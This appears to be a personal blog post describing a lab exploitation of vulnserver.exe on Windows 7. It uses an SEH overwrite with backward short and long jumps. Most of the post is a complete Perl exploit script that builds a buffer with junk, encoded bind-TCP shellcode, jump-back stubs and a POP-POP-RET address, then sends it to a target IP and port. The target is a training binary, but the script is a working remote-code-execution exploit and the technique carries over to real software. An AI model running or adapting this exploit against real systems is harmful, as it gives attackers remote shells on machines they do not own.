Today I have just tried on exploiting vulnserver.exe with SEH overwrite using a backward two byte jump and then a backward long jump on Windows 7 operating system.
Keep in mind that the first byte of a SHORT Jump is EB and the second byte is a relative offset as :
00h to 7Fh using for Forward jumps
80h to FFh using for Backward jumps
The current well known fancy and well formatted document from infosec page refers to exploitation of forward jump, you can reach this original one from the link.
http://resources.infosecinstitute.com/seh-exploit/
Basically my flow is Junk+ShellCode+Nopes+JMPBACK+Nopes+SHORTJMP+PPR+Junk
||
SEH
baddata .= "\x90\x90\xeb\xd9"; SHORTJMP
baddata .= "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1";
(EIP to ECX and decrease ECX and then jmp ECX) .( Taken from phrack#62)
The shellcode is standard bind_tcp_shell with encoded with x86/shikata_ga_nai and badchars are "\x00\x0a\x0d".
#!/usr/bin/perl
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}
$baddata = "GMON /"; # sets variable $baddata to "GMON /"
$baddata .= "A" x 2983;
$baddata .= "\xba\xda\xaa\x03\xdb\xda\xc5\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x56\x31\x53\x13\x83\xeb\xfc\x03\x53\xd5\x48\xf6\x27" .
"\x01\x05\xf9\xd7\xd1\x76\x73\x32\xe0\xa4\xe7\x36\x50\x79" .
"\x63\x1a\x58\xf2\x21\x8f\xeb\x76\xee\xa0\x5c\x3c\xc8\x8f" .
"\x5d\xf0\xd4\x5c\x9d\x92\xa8\x9e\xf1\x74\x90\x50\x04\x74" .
"\xd5\x8d\xe6\x24\x8e\xda\x54\xd9\xbb\x9f\x64\xd8\x6b\x94" .
"\xd4\xa2\x0e\x6b\xa0\x18\x10\xbc\x18\x16\x5a\x24\x13\x70" .
"\x7b\x55\xf0\x62\x47\x1c\x7d\x50\x33\x9f\x57\xa8\xbc\x91" .
"\x97\x67\x83\x1d\x1a\x79\xc3\x9a\xc4\x0c\x3f\xd9\x79\x17" .
"\x84\xa3\xa5\x92\x19\x03\x2e\x04\xfa\xb5\xe3\xd3\x89\xba" .
"\x48\x97\xd6\xde\x4f\x74\x6d\xda\xc4\x7b\xa2\x6a\x9e\x5f" .
"\x66\x36\x45\xc1\x3f\x92\x28\xfe\x20\x7a\x95\x5a\x2a\x69" .
"\xc2\xdd\x71\xe6\x27\xd0\x89\xf6\x2f\x63\xf9\xc4\xf0\xdf" .
"\x95\x64\x79\xc6\x62\x8a\x50\xbe\xfd\x75\x5a\xbf\xd4\xb1" .
"\x0e\xef\x4e\x13\x2e\x64\x8f\x9c\xfb\x2b\xdf\x32\x53\x8c" .
"\x8f\xf2\x03\x64\xda\xfc\x7c\x94\xe5\xd6\x0b\x92\x2b\x02" .
"\x58\x75\x4e\xb4\x4f\xd9\xc7\x52\x05\xf1\x81\xcd\xb1\x33" .
"\xf6\xc5\x26\x4b\xdc\x79\xff\xdb\x68\x94\xc7\xe4\x68\xb2" .
"\x64\x48\xc0\x55\xfe\x82\xd5\x44\x01\x8f\x7d\x0e\x3a\x58" .
"\xf7\x7e\x89\xf8\x08\xab\x79\x98\x9b\x30\x79\xd7\x87\xee" .
"\x2e\xb0\x76\xe7\xba\x2c\x20\x51\xd8\xac\xb4\x9a\x58\x6b" .
"\x05\x24\x61\xfe\x31\x02\x71\xc6\xba\x0e\x25\x96\xec\xd8" .
"\x93\x50\x47\xab\x4d\x0b\x34\x65\x19\xca\x76\xb6\x5f\xd3" .
"\x52\x40\xbf\x62\x0b\x15\xc0\x4b\xdb\x91\xb9\xb1\x7b\x5d" .
"\x10\x72\x8b\x14\x38\xd3\x04\xf1\xa9\x61\x49\x02\x04\xa5" .
"\x74\x81\xac\x56\x83\x99\xc5\x53\xcf\x1d\x36\x2e\x40\xc8" .
"\x38\x9d\x61\xd9";
$baddata .= "\x90" x 133;
$baddata .= "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1";
$baddata .= "\x90" x 17;
$baddata .= "\x90\x90\xeb\xd9";
$baddata .= pack('V', 0x625011bf);
$baddata .= "\x90" x (4000-length($baddata));
$socket = IO::Socket::INET->new( # setup TCP socket $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 IP Address
PeerPort => "$ARGV[1]" # command line variable 2 TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";
$socket->recv($sd, 1024); # Receive 1024 bytes data from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket
No comments:
Post a Comment